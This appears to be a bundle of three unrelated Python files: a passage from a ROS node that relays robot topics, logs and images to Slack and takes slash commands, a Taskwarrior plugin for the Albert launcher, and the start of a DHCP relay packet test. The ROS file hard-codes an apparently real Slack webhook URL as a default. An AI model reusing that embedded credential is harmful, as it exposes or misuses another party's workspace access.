rospy.logwarn("No image retrieved before timeout")
return
if self.type is None:
self.type = image.encoding
try:
# Convert your ROS Image message to OpenCV2
if self.type == "rgb8":
self.type = "bgr8"
cv2_img = self.bridge.imgmsg_to_cv2(image, self.type)
except CvBridgeError, e:
rospy.logwarn(e)
return
# Save your OpenCV2 image
image_file, image_path = tempfile.mkstemp(
'.' + self.image_format)
try:
cv2.imwrite(image_path, cv2_img)
except Exception as e:
rospy.logwarn(
"Exception writing image to file %s" % image_path)
return
# upload to slack
params = {
'token': self.access_token,
'channels': list(self.channels),
'filename': image_path,
'filetype': self.image_format,
'title': self.image_upload_title
}
file = {
'file': open(image_path, 'rb')
}
# remove image
try:
os.remove(image_path)
except Exception as e:
rospy.logwarn(
"Exception removing the image %s" % image_path)
self.send_image(params, file)
rospy.loginfo(
"Image %s uploaded to slack with encoding"
" %s to channels %s" % (
image_path, self.type, str(list(self.channels))))
if not bool(channels):
channels = self.image_up_channels
ImageUploader(
self.access_token, self.bridge,
self.send_image, type, self.image_format, channels,
self.image_upload_title, topic).start()
def process_queue(self):
def __send_out(t):
if self.attachment_buffer[t]:
m = {
'text': self.message_header[t],
'attachments': self.attachment_buffer[t]
}
rospy.logdebug('sending out: %s' % str(m))
self.send(m)
self.attachment_buffer[t] = []
if self.upload_images:
self.log_image(type="rgb8")
while not rospy.is_shutdown():
try:
(topic, attachment) = self.messages.get(
True, timeout=self.throttle_secs)
self.attachment_buffer[topic].append(attachment)
time_elapsed = rospy.Time.now() - self.last_published[topic]
if time_elapsed.to_sec() > self.throttle_secs:
self.last_published[topic] = rospy.Time.now()
__send_out(topic)
self.messages.task_done()
except Empty:
rospy.logdebug('wait time up, time to flush all')
for t in self.attachment_buffer:
__send_out(t)
def _subscribe(self, topic, cb=None):
class DynSub(Thread):
def __init__(self, topic, cb, connected_cb=None):
Thread.__init__(self)
self.topic = topic
self.cb = cb
self.connected_cb = connected_cb
def run(self):
rospy.loginfo(
'trying to connect to topic %s' %
self.topic)
msg_class, real_topic, _ = get_topic_class(
self.topic, blocking=True)
sub = rospy.Subscriber(
real_topic, msg_class, self.cb,
callback_args=(self.topic))
rospy.loginfo(
'connected to topic %s' %
self.topic)
if self.connected_cb:
self.connected_cb(self.topic, sub)
def __connected(topic, sub):
self.subs[topic] = sub
if cb is None:
cb = self._to_slack_cb
DynSub(topic, cb, __connected).start()
def _unsubscribe(self, topic):
if topic in self.subs:
self.subs[topic].unregister()
del self.subs[topic]
def _poll(self, topic, payload, timeout=1.5):
msg_class, real_topic, _ = get_topic_class(
topic, blocking=False)
if msg_class is None:
return '`topic %s not found`' % topic
elif msg_class == Image:
self.log_image(topic=topic, channels=[payload["channel_id"]])
return 'uploading image...'
try:
msg = rospy.wait_for_message(
topic, msg_class, timeout)
return self.__generate_output(msg)
except Exception as e:
return (
'no message received after %.1f seconds: %s' % (
timeout,
str(e)
)
)
def __generate_output(self, msg):
d = strify_message(msg)
# truncate message
lines = d.splitlines()
if len(lines) > self.max_lines:
rospy.loginfo(
'output truncated, too long (shown %d of %d lines only).' %
(self.max_lines, len(lines)))
d = '\n'.join(lines[0:self.max_lines])
d += (
'\n\n[%s]' %
'*** output truncated, too long '
'(showing %d of %d lines only). ***' %
(self.max_lines, len(lines))
)
return d
def _push(self, topic, attachment):
self.messages.put((topic, attachment,))
def _to_slack_cb(self, msg, topic):
rospy.logdebug('msg received on topic %s' % topic)
d = self.__generate_output(msg)
att = {
'text': "```\n%s\n```" % d,
"mrkdwn_in": ["text", "pretext"],
# 'pretext': (
# 'published by node `%s` on `%s`' %
# (msg._connection_header['callerid'], topic)),
'footer': '%s' % str(datetime.now()),
"fallback": d,
'author_name': '%s' % (
msg._connection_header['callerid']),
# 'author_name': '%s: %s (by %s)' % (
# self.sender_name, topic,
# msg._connection_header['callerid']),
"color": '#0000AA',
'ts': rospy.Time.now().secs
}
self.message_header[topic] = (
'*%s* _`%s`_ ' %
(self.sender_name, topic)
)
self._push(topic, att)
def _log_received(self, log_entry, topic):
# make sure we are not listening to ourselves
if log_entry.name == rospy.get_name():
return
level = log_entry.level
logger = log_entry.name
if level not in RosConnector.LEVEL_SETS[
self.active_loggers[logger]
]:
return
att = {
'text': (
'> %s\n'
'_level:_ `%s`\n'
'_file:_ `%s`\n'
'_function:_ `%s`\n'
'_line:_ `%s`\n' %
(
log_entry.msg,
RosConnector.REVERSE_LEVEL_SET[
log_entry.level],
log_entry.file,
log_entry.function,
log_entry.line
)
),
"mrkdwn_in": ["text", "pretext"],
"fallback": str(log_entry),
"pretext": "*%s*" % RosConnector.REVERSE_LEVEL_SET[
log_entry.level],
"color": self.LEVEL_COLORS[level],
'author_name': '%s@%s' % (logger, self.sender_name),
'footer': '%s' % str(datetime.utcfromtimestamp(
log_entry.header.stamp.secs)),
'ts': log_entry.header.stamp.secs
}
self.message_header['__logger__' + logger] = (
'*Logging Event* from node: `%s`' %
logger
)
self._push('__logger__' + logger, att)
def _roslogger(self, args):
parser = argparse.ArgumentParser(prog='/roslogger')
subparsers = parser.add_subparsers(dest='cmd',
help='sub-command')
subparsers.add_parser('enable', help='enable logging')
subparsers.add_parser('disable', help='disable logging')
subparsers.add_parser('list', help='show loggers')
parser_set = subparsers.add_parser(
'set', help='set level node: /roslogger set <nodename> {%s}' %
'|'. join(RosConnector.LEVEL_SETS.keys())
)
parser_set.add_argument(
'logger', help='logger to set'
)
parser_set.add_argument(
'level', help='level to set logger to',
choices=RosConnector.LEVEL_SETS.keys()
)
subparsers.add_parser(
'setall', help='set level for nodes: /roslogger setall {%s}' %
'|'. join(RosConnector.LEVEL_SETS.keys())
).add_argument(
'level', help='level to set logger to',
choices=RosConnector.LEVEL_SETS.keys()
)
try:
args = parser.parse_args(args)
except SystemExit:
return '```\n%s\n```' % parser.format_help()
if args.cmd == 'enable':
self._subscribe('/rosout', self._log_received)
self.logger_enabled = True
return 'subscribing to `/rosout`'
elif args.cmd == 'disable':
self._unsubscribe('/rosout')
self.logger_enabled = False
return 'unsubscribing from `/rosout`'
elif args.cmd == 'set':
self.active_loggers[args.logger] = args.level.lower()
return 'logger `%s` set to level `%s`' % (
args.logger,
args.level
)
elif args.cmd == 'setall':
self.default_level = args.level.lower()
for l in self.active_loggers:
self.active_loggers[l] = self.default_level
return 'all loggers set to level `%s`' % (
args.level
)
elif args.cmd == 'list':
loggers = [
('%s [%s]' % (l, self.active_loggers[l]))
for l in self.active_loggers]
return {
'attachments': [
{
'text': (
'*configured loggers:*\n```\n%s\n```'
% '\n'.join(loggers)),
'author_name': self.sender_name
}
],
'text': (
'_logging enabled_'
if self.logger_enabled else '~logging disabled~'
)
}
def _rostopic(self, args, payload):
parser = argparse.ArgumentParser(prog='/rostopic')
subparsers = parser.add_subparsers(dest='cmd',
help='sub-command')
subparsers.add_parser('list', help='show topics')
subparsers.add_parser(
'subscribe', help='subscribe to topic: /rostopic subscribe <topic>'
).add_argument(
'topic', help='topic to suscribe to'
)
subparsers.add_parser(
'unsubscribe', help='unsubscribe from topic:'
' /rostopic unsubscribe <topic>'
).add_argument(
'topic', help='topic unsubscribe from'
)
subparsers.add_parser(
'poll', help='poll one value from topic: /rostopic read <topic>'
).add_argument(
'topic', help='topic to read from to'
)
try:
args = parser.parse_args(args)
except SystemExit:
return '```\n%s\n```' % parser.format_help()
if args.cmd == 'subscribe':
self._subscribe(args.topic)
return 'subscribing to `%s`' % args.topic
elif args.cmd == 'unsubscribe':
self._unsubscribe(args.topic)
return 'unsubscribing from `%s`' % args.topic
elif args.cmd == 'poll':
return '```\n%s\n```' % self._poll(args.topic, payload)
elif args.cmd == 'list':
topics = rospy.get_published_topics()
tops = [('%s [%s]' % (t[0], t[1])) for t in topics]
return {
'attachments': [
{
'text': (
'*Currently published topics:*\n```\n%s\n```'
% '\n'.join(tops)),
'author_name': self.sender_name
},
{
'text': (
'*Currently subscribed by'
' Slack*:\n```\n%s\n```'
% '\n'.join(self.subs)),
'author_name': self.sender_name
}
],
'text': '_Topics:_'
}
def __call_service(self, service_name, service_args, service_class=None):
import std_msgs.msg
if service_class is None:
service_class = get_service_class_by_name(service_name)
request = service_class._request_class()
try:
now = rospy.get_rostime()
keys = {'now': now, 'auto': std_msgs.msg.Header(stamp=now)}
roslib.message.fill_message_args(request, service_args, keys=keys)
except roslib.message.ROSMessageException, e:
def argsummary(args):
if type(args) in [tuple, list]:
return '\n'.join(
[
' * %s (type %s)' % (a, type(a).__name__)
for a in args])
else:
return ' * %s (type %s)' % (args, type(args).__name__)
return (
"Incompatible arguments to call service:\n%s\n"
"Provided arguments are:\n%s\n\nService arguments are: [%s]"
% (
e, argsummary(service_args),
roslib.message.get_printable_message_args(request)))
try:
return rospy.ServiceProxy(
service_name, service_class)(request)
except rospy.ServiceException, e:
return str(e)
except roslib.message.SerializationError, e:
return (
"Unable to send request."
" One of the fields has an incorrect type:\n"
" %s\n\nsrv file:\n%s"
% (
e,
rosmsg.get_srv_text(service_class._type)))
except rospy.ROSSerializationException, e:
return (
"Unable to send request."
" One of the fields has an incorrect type:\n"
" %s\n\nsrv file:\n%s" % (
e, rosmsg.get_srv_text(service_class._type)))
def _rosservice(self, args):
parser = argparse.ArgumentParser(prog='/rosservice')
subparsers = parser.add_subparsers(dest='cmd',
help='sub-command')
subparsers.add_parser('list', help='show services')
subparsers.add_parser(
'call', help='call server: /rosservice call <service> [<args>]'
).add_argument(
'service', help='topic to suscribe to'
)
try:
args, additonal_args = parser.parse_known_args(args)
except SystemExit:
return '```\n%s\n```' % parser.format_help()
try:
if args.cmd == 'call':
resp = self.__call_service(args.service, additonal_args)
return {
'attachments': [
{
'text': 'Response:\n```\n%s\n```' % resp,
'author_name': '%s@%s' % (
args.service, self.sender_name
)
}
],
'text': '_called `%s`_' % args.service
}
elif args.cmd == 'list':
services = get_service_list()
return {
'attachments': [
{
'text': (
'*Currently available services:*\n```\n%s\n```'
% '\n'.join(services)),
'author_name': 'ROS master@%s' % self.sender_name
}
],
'text': '_Services:_'
}
except Exception as e:
return '```\n%s\n```' % str(e)
def on_slash(self, service, payload):
args = payload['text'].split(' ')
if service == 'rostopic':
return self._rostopic(args, payload)
elif service == 'rosservice':
return self._rosservice(args)
elif service == 'roslogger':
return self._roslogger(args)
else:
args[0] = self.ROS_PREFIX + '/' + service
return self._rosservice(args)
if __name__ == '__main__':
signal.signal(signal.SIGINT, __signal_handler)
rospy.init_node('slackeros')
hook = rospy.get_param(
'~webhook',
'https://hooks.slack.com/services/'
'TCTBP6280/BCU8QFBE1/l2B4r7TRzLJJ37zyhXqtICov')
token = rospy.get_param(
'~access_token',
'xoxb-xxxxxxxxxxxxx-xxxxxxxxxxxxxxxxx-xxxxxxxxxxxxxxx')
wl_users = rospy.get_param(
'~users', '')
wl_channels = rospy.get_param(
'~channels', '')
image_up_channels = rospy.get_param(
'~image_upload_channels', '')
topics = rospy.get_param(
'~topics', '')
url_prefix = rospy.get_param(
'~url_prefix', '')
sc = RosConnector(
incoming_webhook=hook,
access_token=token,
whitelist_users=wl_users.split(' '),
whitelist_channels=wl_channels.split(' '),
image_up_channels=image_up_channels.split(' '),
topics=topics.split(' '),
prefix=url_prefix
)
sc.run()
|
__init__.py
|
"""Interact with Taskwarrior."""
import datetime
import os
import re
import threading
import traceback
from abc import ABCMeta, abstractmethod
from pathlib import Path
from shutil import which
from subprocess import PIPE, Popen
from typing import List, Optional, Tuple, Union
import albert as v0 # type: ignore
import dateutil
import gi
import taskw
from fuzzywuzzy import process
from overrides import overrides
from taskw_gcal_sync import TaskWarriorSide
gi.require_version("Notify", "0.7") # isort:skip
gi.require_version("GdkPixbuf", "2.0") # isort:skip
from gi.repository import GdkPixbuf, Notify # isort:skip # type: ignore
# metadata ------------------------------------------------------------------------------------
__title__ = "Taskwarrior interaction"
__version__ = "0.4.0"
__triggers__ = "t "
__authors__ = "Nikos Koukis"
__homepage__ = "https://github.com/bergercookie/awesome-albert-plugins"
__simplename__ = "taskwarrior"
# initial checks ------------------------------------------------------------------------------
# icon ----------------------------------------------------------------------------------------
icon_path = os.path.join(os.path.dirname(__file__), "taskwarrior.svg")
icon_path_b = os.path.join(os.path.dirname(__file__), "taskwarrior_blue.svg")
icon_path_r = os.path.join(os.path.dirname(__file__), "taskwarrior_red.svg")
icon_path_y = os.path.join(os.path.dirname(__file__), "taskwarrior_yellow.svg")
icon_path_c = os.path.join(os.path.dirname(__file__), "taskwarrior_cyan.svg")
icon_path_g = os.path.join(os.path.dirname(__file__), "taskwarrior_green.svg")
# initial configuration -----------------------------------------------------------------------
# should the plugin show relevant some info without the trigger?
show_items_wo_trigger = True
failure_tag = "fail"
cache_path = Path(v0.cacheLocation()) / __simplename__
config_path = Path(v0.configLocation()) / __simplename__
data_path = Path(v0.dataLocation()) / __simplename__
reminders_tag_path = config_path / "reminders_tag"
reminders_tag = "remindme"
class FileBackedVar:
def __init__(self, varname, convert_fn=str, init_val=None):
self._fpath = config_path / varname
self._convert_fn = convert_fn
if init_val:
with open(self._fpath, "w") as f:
f.write(str(init_val))
else:
self._fpath.touch()
def get(self):
with open(self._fpath, "r") as f:
return self._convert_fn(f.read().strip())
def set(self, val):
with open(self._fpath, "w") as f:
return f.write(str(val))
class TaskWarriorSideWLock:
"""Multithreading-safe version of TaskWarriorSide."""
def __init__(self):
self.tw = TaskWarriorSide(enable_caching=True)
self.tw_lock = threading.Lock()
def start(self, *args, **kargs):
with self.tw_lock:
return self.tw.start(*args, **kargs)
def get_all_items(self, *args, **kargs):
with self.tw_lock:
return self.tw.get_all_items(*args, **kargs)
def get_task_id(self, *args, **kargs):
with self.tw_lock:
return self.tw.get_task_id(*args, **kargs)
@property
def reload_items(self):
return self.tw.reload_items
@reload_items.setter
def reload_items(self, val: bool):
self.tw.reload_items = val
def update_item(self, *args, **kargs):
self.tw.update_item(*args, **kargs)
tw_side = TaskWarriorSideWLock()
last_used_date = FileBackedVar(
"last_date_used",
convert_fn=lambda s: datetime.datetime.strptime(s, "%Y-%m-%d").date(),
init_val=datetime.datetime.today().date(),
)
dev_mode = True
# regular expression to match URLs
# https://gist.github.com/gruber/8891611
url_re = re.compile(
r"""(?i)\b((?:https?:(?:/{1,3}|[a-z0-9%])|[a-z0-9.\-]+[.](?:com|net|org|edu|gov|mil|aero|asia|biz|cat|coop|info|int|jobs|mobi|museum|name|post|pro|tel|travel|xxx|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cs|cu|cv|cx|cy|cz|dd|de|dj|dk|dm|do|dz|ec|ee|eg|eh|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|Ja|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tp|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|yu|za|zm|zw)/)(?:[^\s()<>{}\[\]]+|\([^\s()]*?\([^\s()]+\)[^\s()]*?\)|\([^\s]+?\))+(?:\([^\s()]*?\([^\s()]+\)[^\s()]*?\)|\([^\s]+?\)|[^\s`!()\[\]{};:'".,<>?«»“”‘’])|(?:(?<!@)[a-z0-9]+(?:[.\-][a-z0-9]+)*[.](?:com|net|org|edu|gov|mil|aero|asia|biz|cat|coop|info|int|jobs|mobi|museum|name|post|pro|tel|travel|xxx|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cs|cu|cv|cx|cy|cz|dd|de|dj|dk|dm|do|dz|ec|ee|eg|eh|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|Ja|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tp|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|yu|za|zm|zw)\b/?(?!@)))"""
)
# plugin main functions -----------------------------------------------------------------------
def do_notify(msg: str, image=None):
app_name = "Taskwarrior"
Notify.init(app_name)
image = image
n = Notify.Notification.new(app_name, msg, image)
n.show()
def date_only_tzlocal(datetime: datetime.datetime):
return datetime.astimezone(dateutil.tz.tzlocal()).date() # type: ignore
def get_tasks_of_date(date: datetime.date):
tasks = tw_side.get_all_items(skip_completed=True)
# You have to do the comparison in tzlocal. TaskWarrior stores the tasks in UTC and thus
# the effetive date*time* may not match the given date parameter because of the time
# difference
tasks = [t for t in tasks if "due" in t.keys() and date_only_tzlocal(t["due"]) == date]
return tasks
def initialize():
# Called when the extension is loaded (ticked in the settings) - blocking
# create cache location
config_path.mkdir(parents=False, exist_ok=True)
def finalize():
pass
def handleQuery(query):
results = []
# we're into the new day, create and assign a fresh instance
last_used = last_used_date.get()
current_date = datetime.datetime.today().date()
global tw_side, subcommands
if last_used < current_date:
tw_side = TaskWarriorSideWLock()
subcommands = create_subcommands()
last_used_date.set(current_date)
elif last_used > current_date:
# maybe due to NTP?
v0.critical(
f"Current date {current_date} < last_used date {last_used} ?! Overriding current date, please report this if it persists"
)
tw_side = TaskWarriorSideWLock()
subcommands = create_subcommands()
last_used_date.set(current_date)
if not query.isTriggered:
if show_items_wo_trigger and len(query.string) < 2:
results = [
ActiveTasks().get_as_albert_item(),
TodayTasks().get_as_albert_item(),
*results,
]
else:
# join any previously launched threads
for i in range(len(workers)):
workers.pop(i).join(2)
try:
query.disableSort()
results_setup = setup(query)
if results_setup:
return results_setup
tasks = tw_side.get_all_items(skip_completed=True)
query_str = query.string
if len(query_str) < 2:
results.extend([s.get_as_albert_item() for s in subcommands])
results.append(
get_as_item(
text="Reload list of tasks",
actions=[v0.FuncAction("Reload", async_reload_items)],
)
)
tasks.sort(key=lambda t: t["urgency"], reverse=True)
results.extend([get_tw_item(task) for task in tasks])
else:
subcommand_query = get_subcommand_query(query_str)
if subcommand_query:
results.extend(
subcommand_query.command.get_as_albert_items_full(
subcommand_query.query
)
)
if not results:
results.append(get_as_item(text="No results"))
else:
# find relevant results
desc_to_task = {task["description"]: task for task in tasks}
matched = process.extract(query_str, list(desc_to_task.keys()), limit=30)
for m in [elem[0] for elem in matched]:
task = desc_to_task[m]
results.append(get_tw_item(task))
except Exception: # user to report error
if dev_mode:
v0.critical(traceback.format_exc())
raise
results.insert(
0,
v0.Item(
id=__title__,
icon=icon_path,
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
v0.ClipAction(
f"Copy error - report it to {__homepage__[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
return results
def get_as_item(**kargs) -> v0.Item:
if "icon" in kargs:
icon = kargs.pop("icon")
else:
icon = icon_path
return v0.Item(id=__title__, icon=icon, **kargs)
# supplementary functions ---------------------------------------------------------------------
workers: List[threading.Thread] = []
def async_reload_items():
def do_reload():
v0.info("TaskWarrior: Updating list of tasks...")
tw_side.reload_items = True
tw_side.get_all_items(skip_completed=True)
t = threading.Thread(target=do_reload)
t.start()
workers.append(t)
def setup(query): # type: ignore
results = []
if not which("task"):
results.append(
v0.Item(
id=__title__,
icon=icon_path,
text=f'"taskwarrior" is not installed.',
subtext='Please install and configure "taskwarrior" accordingly.',
actions=[
v0.UrlAction(
'Open "taskwarrior" website', "https://taskwarrior.org/download/"
)
],
)
)
return results
return results
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
def get_as_subtext_field(field, field_title=None):
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}:" + s
return s
def urgency_to_visuals(prio: Union[float, None]) -> Tuple[Union[str, None], Path]:
if prio is None:
return None, Path(icon_path)
elif prio < 4:
return "↓", Path(icon_path_b)
elif prio < 8:
return "↘", Path(icon_path_c)
elif prio < 11:
return "-", Path(icon_path_g)
elif prio < 15:
return "↗", Path(icon_path_y)
else:
return "↑", Path(icon_path_r)
def fail_task(task_id: list):
run_tw_action(args_list=[task_id, "modify", "+fail"])
run_tw_action(args_list=[task_id, "done"])
def run_tw_action(args_list: list, need_pty=False):
args_list = ["task", "rc.recurrence.confirmation=no", "rc.confirmation=off", *args_list]
if need_pty:
args_list.insert(0, "x-terminal-emulator")
args_list.insert(1, "-e")
proc = Popen(args_list, stdout=PIPE, stderr=PIPE)
stdout, stderr = proc.communicate()
if proc.returncode != 0:
image = icon_path_r
msg = f'stdout: {stdout.decode("utf-8")} | stderr: {stderr.decode("utf-8")}'
else:
image = icon_path
msg = stdout.decode("utf-8")
do_notify(msg=msg, image=image)
async_reload_items()
def get_tw_item(task: taskw.task.Task) -> v0.Item: # type: ignore
"""Get a single TW task as an Albert Item."""
field = get_as_subtext_field
task_id = tw_side.get_task_id(task)
actions = [
v0.FuncAction(
"Complete task",
lambda args_list=["done", task_id]: run_tw_action(args_list),
),
v0.FuncAction(
"Delete task",
lambda args_list=["delete", task_id]: run_tw_action(args_list),
),
v0.FuncAction(
"Start task",
lambda args_list=["start", task_id]: run_tw_action(args_list),
),
v0.FuncAction(
"Stop task",
lambda args_list=["stop", task_id]: run_tw_action(args_list),
),
v0.FuncAction(
"Edit task interactively",
lambda args_list=["edit", task_id]: run_tw_action(args_list, need_pty=True),
),
v0.FuncAction(
"Fail task",
lambda task_id=task_id: fail_task(task_id=task_id),
),
v0.ClipAction("Copy task UUID", f"{task_id}"),
]
found_urls = url_re.findall(task["description"])
if "annotations" in task.keys():
found_urls.extend(url_re.findall(" ".join(task["annotations"])))
for url in found_urls[-1::-1]:
actions.insert(0, v0.UrlAction(f"Open {url}", url))
if reminders_tag_path.is_file():
global reminders_tag
reminders_tag = load_data(reminders_tag_path)
else:
save_data("remindme", reminders_tag_path)
actions.append(
v0.FuncAction(
f"Add to Reminders (+{reminders_tag})",
lambda args_list=[
"modify",
task_id,
f"+{reminders_tag}",
]: run_tw_action(args_list),
)
)
urgency_str, icon = urgency_to_visuals(task.get("urgency"))
text = f'{task["description"]}'
if "start" in task:
text = f'<p style="color:orange;">{text}</p>'
due = None
if "due" in task:
due = task["due"].astimezone(dateutil.tz.tzlocal()).strftime("%Y-%m-%d %H:%M:%S") # type: ignore
return get_as_item(
text=text,
subtext="{}{}{}{}{}".format(
field(urgency_str),
"ID: {}... | ".format(tw_side.get_task_id(task)[:8]),
field(task["status"]),
field(task.get("tags"), "tags"),
field(due, "due"),
)[:-2],
icon=str(icon),
completion=f'{__triggers__}{task["description"]}',
actions=actions,
)
# subcommands ---------------------------------------------------------------------------------
class Subcommand:
def __init__(self, *, name, desc):
self.name = name
self.desc = desc
self.subcommand_prefix = f"{__triggers__}{self.name}"
def get_as_albert_item(self):
return get_as_item(text=self.desc, completion=f"{self.subcommand_prefix} ")
def get_as_albert_items_full(self, query_str):
return [self.get_as_albert_item()]
def __str__(self) -> str:
return f"Name: {self.name} | Description: {self.desc}"
class AddSubcommand(Subcommand):
def __init__(self):
super(AddSubcommand, self).__init__(name="add", desc="Add a new task")
@overrides
def get_as_albert_items_full(self, query_str):
items = []
add_item = self.get_as_albert_item()
add_item.subtext = query_str
add_item.completion = f"{self.subcommand_prefix} {query_str}"
add_item.addAction(
v0.FuncAction(
"Add task",
lambda args_list=["add", *query_str.split()]: run_tw_action(args_list),
)
)
items.append(add_item)
to_reminders = self.get_as_albert_item()
to_reminders = v0.Item(
id=__title__,
text=f"Add +{reminders_tag} tag",
subtext="Add +remindme on [TAB]",
icon=icon_path_y,
completion=f"{self.subcommand_prefix} {query_str} +remindme",
)
items.append(to_reminders)
def item_at_date(date: datetime.date, time_24h: int):
dt_str = f'{date.strftime("%Y%m%d")}T{time_24h}0000'
return v0.Item(
id=__title__,
text=f"Due {date}, at {time_24h}:00",
subtext="Add due:dt_str on [TAB]",
icon=icon_path_c,
completion=f"{self.subcommand_prefix} {query_str} due:{dt_str}",
)
items.append(item_at_date(datetime.date.today(), time_24h=15))
items.append(item_at_date(datetime.date.today(), time_24h=19))
items.append(item_at_date(datetime.date.today() + datetime.timedelta(days=1),
time_24h=10))
items.append(item_at_date(datetime.date.today() + datetime.timedelta(days=1),
time_24h=15))
items.append(item_at_date(datetime.date.today() + datetime.timedelta(days=1),
time_24h=19))
return items
class LogSubcommand(Subcommand):
def __init__(self):
super(LogSubcommand, self).__init__(name="log", desc="Log an already done task")
@overrides
def get_as_albert_items_full(self, query_str):
item = self.get_as_albert_item()
item.subtext = query_str
item.addAction(
v0.FuncAction(
"Log task",
lambda args_list=["log", *query_str.split()]: run_tw_action(args_list),
)
)
return [item]
class ActiveTasks(Subcommand):
def __init__(self):
super(ActiveTasks, self).__init__(name="active", desc="Active tasks")
@overrides
def get_as_albert_items_full(self, query_str):
return [
get_tw_item(t) for t in tw_side.get_all_items(skip_completed=True) if "start" in t
]
def move_tasks_of_date_to_next_day(date: datetime.date):
for t in get_tasks_of_date(date):
tw_side.update_item(item_id=str(t["uuid"]), due=t["due"] + datetime.timedelta(days=1))
class DateTasks(Subcommand):
"""
Common parent to classes like TodayTasks, and YesterdayTasks so as to not repeat ourselves.
"""
def __init__(self, date: datetime.date, *args, **kargs):
super(DateTasks, self).__init__(*args, **kargs)
self.date = date
@overrides
def get_as_albert_item(self):
item = super().get_as_albert_item()
item.addAction(
v0.FuncAction(
"Move tasks to the day after",
lambda date=self.date: move_tasks_of_date_to_next_day(date),
)
)
return item
@overrides
def get_as_albert_items_full(self, query_str):
return [get_tw_item(t) for t in get_tasks_of_date(self.date)]
class TodayTasks(DateTasks):
def __init__(self):
super(TodayTasks, self).__init__(
date=datetime.date.today(), name="today", desc="Today's tasks"
)
class YesterdayTasks(DateTasks):
def __init__(self):
super(YesterdayTasks, self).__init__(
date=datetime.date.today() - datetime.timedelta(days=1),
name="yesterday",
desc="Yesterday's tasks",
)
class TomorrowTasks(DateTasks):
def __init__(self):
super(TomorrowTasks, self).__init__(
date=datetime.date.today() + datetime.timedelta(days=1),
name="tomorrow",
desc="Tomorrow's tasks",
)
class SubcommandQuery:
def __init__(self, subcommand: Subcommand, query: str):
"""
Query for a specific subcommand.
:query: Query text - doesn't include the subcommand itself
"""
self.command = subcommand
self.query = query
def __str__(self) -> str:
return f"Command: {self.command}\nQuery Text: {self.query}"
def create_subcommands():
return [
AddSubcommand(),
LogSubcommand(),
ActiveTasks(),
TodayTasks(),
YesterdayTasks(),
TomorrowTasks(),
]
subcommands = create_subcommands()
def get_subcommand_for_name(name: str) -> Optional[Subcommand]:
"""Get a subcommand with the indicated name."""
matching = [s for s in subcommands if s.name.lower() == name.lower()]
if matching:
return matching[0]
def get_subcommand_query(query_str: str) -> Optional[SubcommandQuery]:
"""
Determine whether current query is of a subcommand.
If so first returned the corresponding SubcommandQeury object.
"""
if not query_str:
return None
# spilt:
# "subcommand_name rest of query" -> ["subcommand_name", "rest of query""]
query_parts = query_str.strip().split(None, maxsplit=1)
if len(query_parts) < 2:
query_str = ""
else:
query_str = query_parts[1]
subcommand = get_subcommand_for_name(query_parts[0])
if subcommand:
return SubcommandQuery(subcommand=subcommand, query=query_str)
|
dhcp_relay_test.py
|
import ast
import struct
import ipaddress
import binascii
# Packet Test Framework imports
import ptf
import ptf.packet as scapy
import ptf.testutils as testutils
from ptf import config
from ptf.base_tests import BaseTest
from ptf.mask import Mask
import scapy.all as scapy2
from threading import Thread
# Helper function to increment an IP address
# ip_addr should be passed as a dot-decimal string
# Return value is also a dot-decimal string
def incrementIpAddress(ip_addr, by=1):
new_addr = ipaddress.ip_address(str(ip_addr))
new_addr = new_addr + by
return str(new_addr)
class DataplaneBaseTest(BaseTest):
def __init__(self):
BaseTest.__init__(self)
def setUp(self):
self.dataplane = ptf.dataplane_instance
self.dataplane.flush()
if config["log_dir"] is not None:
filename = os.path.join(config["log_dir"], str(self)) + ".pcap"
self.dataplane.start_pcap(filename)
def tearDown(self):
if config["log_dir"] is not None:
self.dataplane.stop_pcap()
"""
